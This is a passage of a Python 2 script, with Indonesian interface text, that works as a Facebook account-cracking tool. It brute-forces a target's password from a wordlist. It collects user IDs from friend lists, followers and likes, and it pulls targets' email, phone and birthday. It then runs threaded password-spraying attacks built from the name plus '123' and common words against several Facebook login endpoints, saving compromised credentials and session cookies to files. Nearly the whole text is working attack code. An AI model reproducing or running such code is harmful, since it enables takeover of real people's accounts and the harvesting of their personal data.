email = raw_input("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] ID TARGET: ")
passw = raw_input("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Wordlist: ")
total = open(passw,"r")
total = total.readlines()
time.sleep(1)
print("\033[0;96m"+50*"-")
time.sleep(1)
print "\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] ID TARGET : "+email
time.sleep(1)
print "\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Total Password : "+str(len(total))
time.sleep(1)
jalan('\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Crack Started...')
sandi = open(passw,"r")
for pw in sandi:
try:
pw = pw.replace("\n","")
sys.stdout.write("\r\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Check Pass Valid : "+pw)
sys.stdout.flush()
data = requests.get("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(email)+"&locale=en_US&password="+(pw)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
dapat = open("ok.txt", "w")
dapat.write(email+"|"+pw+"\n")
dapat.close()
time.sleep(1.5)
print "\n [\033[1;36m\xe2\x80\xa2\x1b[1;37m] ACCOUNT SUCCES [\033[1;36m\xe2\x80\xa2\x1b[1;37m]"
time.sleep(2)
print("\033[0;96m"+50*"-")
print("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] ID : "+email)
print("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Pass Valid : "+pw)
print("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] HASIL CRACK TERSIMPAN DI : ok.txt")
raw_input(" [BACK]")
menu()
elif 'www.facebook.com' in mpsh["error_msg"]:
ceks = open("cp.txt", "w")
ceks.write(email+"|"+pw+"\n")
ceks.close()
time.sleep(1.5)
print "\n [\033[1;36m\xe2\x80\xa2\x1b[1;37m] ACCOUNT CHECKPOINT [\033[1;36m\xe2\x80\xa2\x1b[1;37m]"
time.sleep(2)
print("\033[0;96m"+50*"-")
print("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] ID : "+email)
print("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Pass Valid : "+pw)
print("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] HASIL CRACK TERSIMPAN DI : cp.txt")
raw_input(" [BACK]")
menu()
except requests.exceptions.ConnectionError:
print"\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Connection Error"
time.sleep(1)
except IOError:
print ("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] File Wordlist Tidak Di Temukan")
time.sleep(2)
menu()
################ LAGI DI UPDATE! #############$##
def wordlist(): #~~~MASIH DI UPDATE
try:
toket=open('___dekura___sayang___ara___','r').read()
except IOError:
print"\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Token/Cookie Invalid"
os.system('rm -rf ___dekura___sayang___ara___')
login()
os.system('clear')
print logo
print("\033[0;96m"+50*"-")
try:
idt = raw_input("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] ID TARGET: ")
r = requests.get('https://graph.facebook.com/'+idt+'/?access_token='+toket)
z = json.loads(r.text)
nama = z['first_name']
hasil = open("pass.txt", "w")
hasil.write(nama+"123\n"+nama+"123456"+"""
""")
hasil.close()
except Exception as e:
exit('\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Error: %s' % e)
### ID Friendslist/Public ###
def publik():
try:
toket = open('___dekura___sayang___ara___', 'r').read()
except IOError:
os.system('rm -rf ___dekura___sayang___ara___')
time.sleep(0.01)
os.sys.exit()
print "\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Type \'me\' Crack From Friendlist"
idt = raw_input('\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] User ID Target: ')
try:
r = requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+toket)
z = json.loads(r.text)
for a in z['data']:
idne = a['id']
jenenge = a["name"]
id.append(idne+'<=>'+jenenge)
except KeyError:
exit('\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Pertemanan Tidak Ada!')
print '\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Total ID: %s' % len(id)
### ID Dari Followers ###
def followers():
try:
toket = open('___dekura___sayang___ara___', 'r').read()
except IOError:
os.system('rm -rf ___dekura___sayang___ara___')
time.sleep(0.01)
os.sys.exit()
print "\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Type \'me\' Crack From Friendlist"
idt = raw_input('\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] User ID Target: ')
try:
r = requests.get("https://graph.facebook.com/"+idt+"/subscribers?limit=20000&access_token="+toket)
z = json.loads(r.text)
for a in z['data']:
idne = a['id']
jenenge = a["name"]
id.append(idne+'<=>'+jenenge)
except KeyError:
exit('\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] User Followers Tidak Ada!')
print '\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Total ID: %s' % len(id)
### Krek ID Massal ##
def dekura___sayang___ara():
try:
toket = open('___dekura___sayang___ara___', 'r').read()
except IOError:
os.system('rm -rf ___dekura___sayang___ara___')
time.sleep(0.01)
os.sys.exit()
print "\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Type \'me\' Crack From Friendlist"
idt = raw_input('\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] User ID Target: ')
iduo = raw_input('\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] User ID Target: ')
try:
r = requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+toket)
z = json.loads(r.text)
k = requests.get('https://graph.facebook.com/'+iduo+'/friends?access_token='+toket)
j = json.loads(k.text)
for a in z['data']:
idne = a['id']
jenenge = a["name"]
for x in j['data']:
iduoo = x['id']
jenengeee = x["name"]
kntl = (idne + iduoo)
jmbd = (jenengeee + jenenge)
id.append(kntl+'<=>'+jmbd)
except KeyError:
print "kntl"
print '\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Total ID: %s' % len(id)
### ID Dari Likes ###
def likes():
try:
toket = open('___dekura___sayang___ara___', 'r').read()
except IOError:
os.system('rm -rf ___dekura___sayang___ara___')
time.sleep(0.01)
os.sys.exit()
print "\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Type \'me\' Crack From Friendlist"
idt = raw_input('\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] User ID Target: ')
try:
r=requests.get("https://graph.facebook.com/"+idt+"/likes?limit=100000&access_token="+toket)
z = json.loads(r.text)
for a in z['data']:
idne = a['id']
jenenge = a["name"]
id.append(idne+'<=>'+jenenge)
except KeyError:
exit('\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] User Like Tidak Ada!')
print '\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Total ID: %s' % len(id)
### Check Info Target ###
def infotarget():
try:
toket = open('___dekura___sayang___ara___','r').read()
except IQError:
os.system('rm -rf ___dekura___sayang___ara___')
time.sleep(0.01)
os.sys.exit()
try:
checkt = raw_input('\x1b[0;96m\x1b[0;97m [\x1b[1;36m•\x1b[1;37m] ID Target: ')
jemudd = requests.get('https://graph.facebook.com/'+checkt+'?access_token=%s'%(toket))
kntl = json.loads(jemudd.text)
fol = requests.get('https://graph.facebook.com/'+checkt+'/subscribers?access_token=%s'%(toket))
pol = json.loads(fol.text)
batir = requests.get('https://graph.facebook.com/'+checkt+'/friends?access_token='+toket)
batirecheck = json.loads(batir.text)
idne = batirecheck['id']
id.append(idne)
nick = kntl['name']
except KeyError:
nick = "Tidak Di Temukan "
except: pass
try:
depan = kntl['frist_name']
except KeyError:
depan = "Tidak Di Temukan "
except: pass
try:
tengah = kntl['middle_name']
except KeyError:
tengah = "Tidak Di Temukan "
except: pass
try:
blngkg = kntl['last_name']
except KeyError:
blngkg = "Tidak Di Temukan "
except: pass
try:
email = kntl['email']
except KeyError:
email = "Tidak Di Temukan "
except: pass
try:
nomor = kntl['phone']
except KeyError:
nomor = "Tidak Di Temukan "
except: pass
try:
sekolah = kntl['school']
except KeyError:
sekolah = "Tidak Di Temukan "
except: pass
try:
jenis = kntl['gender']
except KeyError:
jenis = "Tidak Di Temukan "
except: pass
try:
lokasi = kntl['location']['name']
except KeyError:
lokasi = "Tidak Di Temukan "
except: pass
try:
followers = pol['summary']['total_count']
except KeyError:
followers = "Tidak Di Temukan"
except: pass
try:
tinggal = kntl['hometown']['name']
except KeyError:
tinggal = "Tidak Di Temukan "
except: pass
try:
ttl = kntl['birthday']
except KeyError:
ttl = "Tidak Di Temukan "
except: pass
# try:
# hobi = kntl['profession']
# except KeyError:
# hobi = "Tidak Di Temukan "
# except: pass
print (" Nick : %s"%nick)
#print (" Nama Depan : %s"%depan)
#print (" Nama Belakang: %s"%tengah)
print (" School : %s"%sekolah)
print (" Gender : %s"%jenis)
print (" Location : %s"%lokasi)
print (" Mobile Phone : %s"%nomor)
print (" Email : %s"%email)
print (" Friendslist : %s"%(str(len(id))))
print (" Followers : %s"%followers)
print (" HomeTown : %s"%tinggal)
print (" Birthday : %s"%ttl)
#print (" Hobby : %s"%hobi)
### Methode Cracknya ###
def dekura_x():
print '\n\x1b[0;97m [ \x1b[1;36mPilih Metode crack\x1b[1;37m ]'
print '\x1b[0;96m\x1b[0;97m [\x1b[1;36m1\x1b[1;37m] Crack With Api.Facebook (%sFast crack%s)'%(o,p)
print '\x1b[0;96m\x1b[0;97m [\x1b[1;36m2\x1b[1;37m] Crack With Mbasic.Facebook (%sRecommended crack%s)'%(o,p)
print '\x1b[0;96m\x1b[0;97m [\x1b[1;36m3\x1b[1;37m] Crack With Touch.Facebook '
print '\x1b[0;96m\x1b[0;97m [\x1b[1;36m3\x1b[1;37m] Crack With M.Facebook '
print '\x1b[0;96m\x1b[0;97m [\x1b[1;36m5\x1b[1;37m] Crack With Free.Facebook '
print ''
dekurasayangara = raw_input("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Choose: ")
if dekurasayangara == "":
menu()
elif dekurasayangara == "1":
bukanmaen = raw_input("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Crack With Pass Default/Manual [d/m]\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Choose: ")
if bukanmaen == "m":
with ThreadPoolExecutor(max_workers=30) as coeg:
print("\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Example : pass123,pass12345")
asu = raw_input("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Pass List: ").split(",")
if len(asu) =="":
exit("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] jangan kosong")
print "\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Account [OK] saved to : ok.txt"
print '\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Account [CP] saved to : cp.txt'
for user in id:
uid, name = user.split("<=>")
coeg.submit(api, uid, asu)
hasil()
elif bukanmaen == "d":
with ThreadPoolExecutor(max_workers=30) as coeg:
print "\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Account [OK] saved to : ok.txt"
print '\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Account [CP] saved to : cp.txt'
for user in id:
uid, name = user.split("<=>")
if len(name)>=6:
dekura = [ name, name+"123", name+"12345", name+"123456" ]
elif len(name)<=2:
dekura = [ name, name+"123", name+"12345", name+"123456" ]
elif len(name)<=3:
dekura = [ name, name+"123", name+"12345", name+"123456" ]
else:
dekura = [ "sayang", "bissmilah", "anjing", "bangsat", "freefire", "rahasia", "katasandi", "kontol", "bajingan", "indonesia", "sayangkamu" ]
coeg.submit(api, uid, dekura)
hasil()
elif dekurasayangara == "2":
bukanmaen = raw_input("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Crack With Pass Default/Manual [d/m]\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Choose: ")
if bukanmaen == "m":
with ThreadPoolExecutor(max_workers=30) as coeg:
print("\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Example : pass123,pass12345")
asu = raw_input("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Pass List: ").split(",")
if len(asu) =="":
exit("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] jangan kosong")
print "\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Account [OK] saved to : ok.txt"
print '\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Account [CP] saved to : cp.txt'
for user in id:
uid, name = user.split("<=>")
coeg.submit(mbasic, uid, asu)
hasil()
elif bukanmaen == "d":
with ThreadPoolExecutor(max_workers=35) as coeg:
print "\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Account [OK] saved to : ok.txt"
print '\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Account [CP] saved to : cp.txt'
for user in id:
uid, name = user.split("<=>")
if len(name)>=6:
dekura = [ name, name+"123", name+"12345", name+"123456" ]
elif len(name)<=2:
dekura = [ name, name+"123", name+"12345", name+"123456" ]
elif len(name)<=3:
dekura = [ name, name+"123", name+"12345", name+"123456" ]
else:
dekura = [ "sayang", "bissmilah", "anjing", "bangsat", "freefire", "rahasia", "katasandi", "kontol", "bajingan", "indonesia", "sayangkamu" ]
coeg.submit(mbasic, uid, dekura)
hasil()
elif dekurasayangara == "3":
bukanmaen = raw_input("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Crack With Pass Default/Manual [d/m]\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Choose: ")
if bukanmaen == "m":
with ThreadPoolExecutor(max_workers=30) as coeg:
print("\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Example : pass123,pass12345")
asu = raw_input("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Pass List: ").split(",")
if len(asu) =="":
exit("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] jangan kosong")
print "\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Account [OK] saved to : ok.txt"
print '\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Account [CP] saved to : cp.txt'
for user in id:
uid, name = user.split("<=>")
coeg.submit(touch, uid, asu)
hasil()
elif bukanmaen == "d":
with ThreadPoolExecutor(max_workers=30) as coeg:
print "\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Account [OK] saved to : ok.txt"
print '\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Account [CP] saved to : cp.txt'
for user in id:
uid, name = user.split("<=>")
if len(name)>=6:
dekura = [ name, name+"123", name+"12345", name+"123456" ]
elif len(name)<=2:
dekura = [ name, name+"123", name+"12345", name+"123456" ]
elif len(name)<=3:
dekura = [ name, name+"123", name+"12345", name+"123456" ]
else:
dekura = [ "sayang", "bissmilah", "anjing", "bangsat", "freefire", "rahasia", "katasandi", "kontol", "bajingan", "indonesia", "sayangkamu" ]
coeg.submit(touch, uid, dekura)
hasil()
else:
exit("\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Keyword Salah!")
elif dekurasayangara == "4":
bukanmaen = raw_input("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Crack With Pass Default/Manual [d/m]\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Choose: ")
if bukanmaen == "m":
with ThreadPoolExecutor(max_workers=30) as coeg:
print("\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Example : pass123,pass12345")
asu = raw_input("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Pass List: ").split(",")
if len(asu) =="":
exit("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] jangan kosong")
print "\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Account [OK] saved to : ok.txt"
print '\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Account [CP] saved to : cp.txt'
for user in id:
uid, name = user.split("<=>")
coeg.submit(mfacebook, uid, asu)
hasil()
elif bukanmaen == "d":
with ThreadPoolExecutor(max_workers=30) as coeg:
print "\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Account [OK] saved to : ok.txt"
print '\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Account [CP] saved to : cp.txt'
for user in id:
uid, name = user.split("<=>")
if len(name)>=6:
dekura = [ name, name+"123", name+"12345", name+"123456" ]
elif len(name)<=2:
dekura = [ name, name+"123", name+"12345", name+"123456" ]
elif len(name)<=3:
dekura = [ name, name+"123", name+"12345", name+"123456" ]
else:
dekura = [ "sayang", "bissmilah", "anjing", "bangsat", "freefire", "rahasia", "katasandi", "kontol", "bajingan", "indonesia", "sayangkamu" ]
coeg.submit(mfacebook, uid, dekura)
hasil()
else:
exit("\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Keyword Salah!")
elif dekurasayangara == "5":
bukanmaen = raw_input("\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Crack With Pass Default/Manual [d/m]\n\033[0;96m\033[0;97m [\033[1;36m•\033[1;37m] Choose: ")
if bukanmaen == "m":
with ThreadPoolExecutor(max_workers=30) as coeg:
print("\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Example : pass123,pass12345")
asu = raw_input("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Pass List: ").split(",")
if len(asu) =="":
exit("\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] jangan kosong")
print "\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Account [OK] saved to : ok.txt"
print '\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Account [CP] saved to : cp.txt'
for user in id:
uid, name = user.split("<=>")
coeg.submit(freefb, uid, asu)
hasil()
elif bukanmaen == "d":
with ThreadPoolExecutor(max_workers=30) as coeg:
print "\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Account [OK] saved to : ok.txt"
print '\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Account [CP] saved to : cp.txt'
for user in id:
uid, name = user.split("<=>")
if len(name)>=6:
dekura = [ name, name+"123", name+"12345", name+"123456" ]
elif len(name)<=2:
dekura = [ name, name+"123", name+"12345", name+"123456" ]
elif len(name)<=3:
dekura = [ name, name+"123", name+"12345", name+"123456" ]
else:
dekura = [ "sayang", "bissmilah", "anjing", "bangsat", "freefire", "rahasia", "katasandi", "kontol", "bajingan", "indonesia", "sayangkamu" ]
coeg.submit(freefb, uid, dekura)
hasil()
else:
exit("\n\x1b[0;96m\x1b[0;97m [\x1b[1;36m\xe2\x80\xa2\x1b[1;37m] Keyword Salah!")
else:
menu()
### Api Fast Crack ###
def api(uid, dekura):
ua = open("ua.txt").read()
global ok, cp, loop, token
sys.stdout.write(
"\r [Crack] %s/%s - Ok-:%s - Cp-:%s"%(loop, len(id), len(ok), len(cp))
); sys.stdout.flush()
for pw in dekura:
pw = pw.lower()
ses = requests.Session()
headers_ = {"x-fb-connection-bandwidth": str(random.randint(20000000.0, 30000000.0)), "x-fb-sim-hni": str(random.randint(20000, 40000)), "x-fb-net-hni": str(random.randint(20000, 40000)), "x-fb-connection-quality": "EXCELLENT", "x-fb-connection-type": "cell.CTRadioAccessTechnologyHSDPA", "user-agent": ua, "content-type": "application/x-www-form-urlencoded", "x-fb-http-engine": "Liger"}
send = ses.get("https://b-api.facebook.com/method/auth.login?format=json&email="+str(uid)+"&password="+str(pw)+"&credentials_type=device_based_login_password&generate_session_cookies=1&error_detail_type=button_with_disabled&source=device_based_login&meta_inf_fbmeta=%20¤tly_logged_in_userid=0&method=GET&locale=en_US&client_country_code=US&fb_api_caller_class=com.facebook.fos.headersv2.fb4aorca.HeadersV2ConfigFetchRequestHandler&access_token=350685531728|62f8ce9f74b12f84c123cc23437a4a32&fb_api_req_friendly_name=authenticate&cpl=true", headers=headers_)
if "session_key" in send.text and "EAAA" in send.text:
print("\r \x1b[1;32m[OK] %s • %s • %s\033[0;97m"%(uid, pw, send.json()["access_token"]))
ok.append("%s|%s"%(uid, pw))
open("ok.txt","a").write("%s|%s\n"%(uid, pw))
break
elif "www.facebook.com" in send.json()["error_msg"]:
try:
token = open("___dekura___sayang___ara___", "r").read()
with requests.Session() as ses:
ttl = ses.get("https://graph.facebook.com/%s?access_token=%s"%(uid, token)).json()["birthday"]
month, day, year = ttl.split("/")
month = bulan_ttl[month]
print("\r\x1b[1;33m [CP] %s • %s • %s %s %s\033[0;97m"%(uid, pw, day, month, year))
cp.append("%s|%s"%(uid, pw))
open("cp.txt","a").write("%s|%s|%s\n"%(uid, pw, ttl))
open("checkcp.txt","a").write("%s|%s|%s\n"%(uid, pw, ttl))
break
except (KeyError, IOError):
day = (" ")
month = (" ")
year = (" ")
except:pass
print("\r\x1b[1;33m [CP] %s • %s\033[0;97m "%(uid, pw))
cp.append("%s|%s"%(uid, pw))
open("cp.txt","a").write("%s|%s\n"%(uid, pw))
open("checkcp.txt","a").write("%s|%s\n"%(uid, pw))
break
else:
continue
loop += 1
### Slow Crack ###
def mbasic(uid, dekura):
ua = open("ua.txt").read()
global ok, cp, loop, token
sys.stdout.write(
"\r [Crack] %s/%s - Ok-:%s - Cp-:%s"%(loop, len(id), len(ok), len(cp))
); sys.stdout.flush()
for pw in dekura:
kwargs = {}
pw = pw.lower()
ses = requests.Session()
ses.headers.update({"origin": "https://mbasic.facebook.com", "accept-language": "id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7", "accept-encoding": "gzip, deflate", "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8", "user-agent": ua, "Host": "mbasic.facebook.com", "referer": "https://mbasic.facebook.com/login/?next&ref=dbl&fl&refid=8", "cache-control": "max-age=0", "upgrade-insecure-requests": "1", "content-type": "application/x-www-form-urlencoded"})
p = ses.get("https://mbasic.facebook.com/login/?next&ref=dbl&refid=8").text
b = parser(p,"html.parser")
bl = ["lsd","jazoest","m_ts","li","try_number","unrecognized_tries","login"]
for i in b("input"):
try:
if i.get("name") in bl:kwargs.update({i.get("name"):i.get("value")})
else:continue
except:pass
kwargs.update({"email": uid,"pass": pw,"prefill_contact_point": "","prefill_source": "","prefill_type": "","first_prefill_source": "","first_prefill_type": "","had_cp_prefilled": "false","had_password_prefilled": "false","is_smart_lock": "false","_fb_noscript": "true"})
aracans = ses.post("https://mbasic.facebook.com/login/device-based/regular/login/?refsrc=https%3A%2F%2Fmbasic.facebook.com%2F&lwv=100&refid=8",data=kwargs)
if "c_user" in ses.cookies.get_dict().keys():
kuki = (";").join([ "%s=%s" % (key, value) for key, value in ses.cookies.get_dict().items() ]).replace("noscript=1;", "")
print("\r \x1b[1;32m[OK] %s • %s • %s\033[0;97m"%(uid, pw, kuki))
ok.append("%s|%s"%(uid, pw))
open("ok.txt","a").write("%s|%s\n"%(uid, pw))
break
elif "checkpoint" in ses.cookies.get_dict().keys():
try:
token = open("___dekura___sayang___ara___", "r").read()
with requests.Session() as ses:
ttl = ses.get("https://graph.facebook.com/%s?access_token=%s"%(uid, token)).json()["birthday"]
month, day, year = ttl.split("/")
month = bulan_ttl[month]
print("\r\x1b[1;33m [CP] %s • %s • %s %s %s\033[0;97m"%(uid, pw, day, month, year))
cp.append("%s|%s"%(uid, pw))
open("cp.txt","a").write("%s|%s|%s\n"%(uid, pw, ttl))
open("checkcp.txt","a").write("%s|%s|%s\n"%(uid, pw, ttl))
break
except (KeyError, IOError):
day = (" ")
month = (" ")
year = (" ")
except:pass
print("\r\x1b[1;33m [CP] %s • %s\033[0;97m "%(uid, pw))
cp.append("%s|%s"%(uid, pw))
open("cp.txt","a").write("%s|%s\n"%(uid, pw))
open("checkcp.txt","a").write("%s|%s\n"%(uid, pw))
break
else:
continue
loop += 1
### Slow Crack ###
def touch(uid, dekura):
ua = open("ua.txt").read()
global ok, cp, loop, token
sys.stdout.write(
"\r [Crack] %s/%s - Ok-:%s - Cp-:%s"%(loop, len(id), len(ok), len(cp))
); sys.stdout.flush()
for pw in dekura:
kwargs = {}
pw = pw.lower()
ses = requests.Session()
ses.headers.update({"origin": "https://touch.facebook.com", "accept-language": "id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7", "accept-encoding": "gzip, deflate", "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8", "user-agent": ua, "Host": "touch.facebook.com", "referer": "https://touch.facebook.com/login/?next&ref=dbl&fl&refid=8", "cache-control": "max-age=0", "upgrade-insecure-requests": "1", "content-type": "application/x-www-form-urlencoded"})
p = ses.get("https://touch.facebook.com/login/?next&ref=dbl&refid=8").text
b = parser(p,"html.parser")
bl = ["lsd","jazoest","m_ts","li","try_number","unrecognized_tries","login"]
for i in b("input"):
try:
if i.get("name") in bl:kwargs.update({i.get("name"):i.get("value")})
else:continue
except:pass
kwargs.update({"email": uid,"pass": pw,"prefill_contact_point": "","prefill_source": "","prefill_type": "","first_prefill_source": "","first_prefill_type": "","had_cp_prefilled": "false","had_password_prefilled": "false","is_smart_lock": "false","_fb_noscript": "true"})
aracans = ses.post("https://touch.facebook.com/login/device-based/regular/login/?refsrc=https%3A%2F%2Ftouch.facebook.com%2F&lwv=100&refid=8",data=kwargs)
if "c_user" in ses.cookies.get_dict().keys():
kuki = (";").join([ "%s=%s" % (key, value) for key, value in ses.cookies.get_dict().items() ]).replace("noscript=1;", "")
print("\r \x1b[1;32m[OK] %s • %s • %s\033[0;97m"%(uid, pw, kuki))
ok.append("%s|%s"%(uid, pw))
open("ok.txt","a").write("%s|%s\n"%(uid, pw))
break
elif "checkpoint" in ses.cookies.get_dict().keys():
try:
token = open("___dekura___sayang___ara___", "r").read()
with requests.Session() as ses:
ttl = ses.get("https://graph.facebook.com/%s?access_token=%s"%(uid, token)).json()["birthday"]
month, day, year = ttl.split("/")
month = bulan_ttl[month]
print("\r\x1b[1;33m [CP] %s • %s • %s %s %s\033[0;97m"%(uid, pw, day, month, year))
cp.append("%s|%s"%(uid, pw))
open("cp.txt","a").write("%s|%s|%s\n"%(uid, pw, ttl))
open("checkcp.txt","a").write("%s|%s|%s\n"%(uid, pw, ttl))
break
except (KeyError, IOError):
day = (" ")
month = (" ")
year = (" ")
except:pass
print("\r\x1b[1;33m [CP] %s • %s\033[0;97m "%(uid, pw))
cp.append("%s|%s"%(uid, pw))
open("cp.txt","a").write("%s|%s\n"%(uid, pw))
open("checkcp.txt","a").write("%s|%s\n"%(uid, pw))
break
else:
continue
loop += 1
### Slow Crack ###
def mfacebook(uid, dekura):
ua = open("ua.txt").read()
global ok, cp, loop, token
sys.stdout.write(
"\r [Crack] %s/%s - Ok-:%s - Cp-:%s"%(loop, len(id), len(ok), len(cp))
); sys.stdout.flush()
for pw in dekura:
kwargs = {}
pw = pw.lower()
ses = requests.Session()
ses.headers.update({"Host":"m.facebook.com","cache-control":"max-age=0","upgrade-insecure-requests":"1","user-agent":ua,"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8","accept-encoding":"gzip, deflate","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"})
